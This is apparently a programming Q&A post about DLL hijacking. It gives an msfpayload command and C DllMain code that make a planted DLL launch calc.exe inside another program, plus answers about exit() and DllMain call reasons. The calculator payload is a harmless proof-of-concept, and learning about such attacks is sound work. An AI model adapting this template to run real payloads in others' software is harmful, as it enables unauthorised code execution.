# Dll Hijacking calculator C code

Tags: c, gcc, dll, exploit

Hi guys I am new to Dll Hijacking. I have few problems and I hope that you would help me clarify my doubts.

Suppose I used msfpayload to generate a calc dll

```
msfpayload windows/exec CMD=calc.exe D > abc.dll
```

The dll file generated by msfpayload works fine, and the calculator prompts along with the software.

So I used the following C code:

```
#include <windows.h>

int owned()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  owned();
  return 0;
}
```

When I compiled this and used only Calculator would prompt. The software won't execute. why is that? I used MinGW GCC compiler to compile.

Answer (score 2, accepted):

> The software won't execute. [W]hy is that?

Almost certainly because `owned()` calls `exit()`. This terminates the process.

Comment: Hey NPE Thanks. The software executed nicely but the the calculator prompted 4 times. Why is that?

Comment: @OsandaMalith: Because `DllMain` is called on four different events: see `fdwReason` in http://msdn.microsoft.com/en-us/library/windows/desktop/ms682583(v=vs.85).aspx